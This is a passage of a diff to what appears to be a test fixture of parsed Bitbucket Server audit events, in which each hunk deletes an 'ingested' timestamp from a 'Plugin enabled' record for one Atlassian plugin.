@@ -7695,7 +7563,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867811931Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.996Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-comment-properties\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-comment-properties\"}]}", "type": "info", "kind": "event" 
@@ -7749,7 +7616,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867813049Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.992Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-comment-likes\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-comment-likes\"}]}", "type": "info", "kind": "event" 
@@ -7803,7 +7669,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867814049Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.967Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-emoticons\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-emoticons\"}]}", "type": "info", "kind": "event" 
@@ -7857,7 +7722,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867815001Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.825Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-code-insights\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-code-insights\"}]}", "type": "info", "kind": "event" 
@@ -7911,7 +7775,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867815906Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.800Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-cluster-info\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-cluster-info\"}]}", "type": "info", "kind": "event" 
@@ -7965,7 +7828,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867816930Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.796Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-client-web-fragments\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-client-web-fragments\"}]}", "type": "info", "kind": "event" 
@@ -8019,7 +7881,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867817971Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.732Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-bundled-hooks\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-bundled-hooks\"}]}", "type": "info", "kind": "event" 
@@ -8073,7 +7934,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867818963Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.340Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-build-jenkins\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-build-jenkins\"}]}", "type": "info", "kind": "event" 
@@ -8127,7 +7987,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867820026Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.068Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-build-feature\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-build-feature\"}]}", "type": "info", "kind": "event" 
@@ -8181,7 +8040,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867821045Z", "original": "{\"timestamp\":\"2021-11-27T17:29:09.008Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-build-bamboo\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-build-bamboo\"}]}", "type": "info", "kind": "event" 
@@ -8235,7 +8093,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867822001Z", "original": "{\"timestamp\":\"2021-11-27T17:29:08.877Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-build\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-build\"}]}", "type": "info", "kind": "event" @@ -8289,7 +8146,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867822954Z", "original": "{\"timestamp\":\"2021-11-27T17:29:08.836Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-branch\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-branch\"}]}", "type": "info", "kind": "event" 
@@ -8343,7 +8199,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867823955Z", "original": "{\"timestamp\":\"2021-11-27T17:29:08.642Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.integration.jira.jira-integration-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.integration.jira.jira-integration-plugin\"}]}", "type": "info", "kind": "event" 
@@ -8397,7 +8252,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867824909Z", "original": "{\"timestamp\":\"2021-11-27T17:29:08.597Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-ref-restriction\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-ref-restriction\"}]}", "type": "info", "kind": "event" @@ -8451,7 +8305,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867825815Z", "original": "{\"timestamp\":\"2021-11-27T17:29:07.438Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.stash.ssh-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.stash.ssh-plugin\"}]}", "type": "info", "kind": "event" 
@@ -8505,7 +8358,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867826756Z", "original": "{\"timestamp\":\"2021-11-27T17:29:07.326Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-authentication\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-authentication\"}]}", "type": "info", "kind": "event" 
@@ -8559,7 +8411,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867827655Z", "original": "{\"timestamp\":\"2021-11-27T17:29:07.312Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-audit\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-audit\"}]}", "type": "info", "kind": "event" 
@@ -8613,7 +8464,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867828561Z", "original": "{\"timestamp\":\"2021-11-27T17:29:07.281Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-announcement-banner\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-announcement-banner\"}]}", "type": "info", "kind": "event" 
@@ -8667,7 +8517,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867829602Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.974Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-analytics-whitelist\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-analytics-whitelist\"}]}", "type": "info", "kind": "event" 
@@ -8721,7 +8570,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867830541Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.973Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-access-tokens\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-access-tokens\"}]}", "type": "info", "kind": "event" 
@@ -8775,7 +8623,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867831477Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.941Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-rest\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-rest\"}]}", "type": "info", "kind": "event" 
@@ -8829,7 +8676,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867832493Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.922Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-webhooks\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-webhooks\"}]}", "type": "info", "kind": "event" 
@@ -8883,7 +8729,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867833552Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.893Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-ao-common\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-ao-common\"}]}", "type": "info", "kind": "event" @@ -8937,7 +8782,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867834487Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.892Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.auiplugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"9.3.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.auiplugin\"}]}", "type": "info", "kind": "event" 
@@ -8991,7 +8835,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867835670Z", "original": "{\"timestamp\":\"2021-11-27T17:29:03.203Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.audit.atlassian-audit-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.12.6\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.audit.atlassian-audit-plugin\"}]}", "type": "info", "kind": "event" @@ -9045,7 +8888,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867836669Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.812Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.atlassian-failure-cache-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.atlassian-failure-cache-plugin\"}]}", "type": "info", "kind": "event" 
@@ -9099,7 +8941,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867837582Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.809Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.applinks.applinks-trustedapps-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.applinks.applinks-trustedapps-plugin\"}]}", "type": "info", "kind": "event" @@ -9153,7 +8994,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867838531Z", "original": 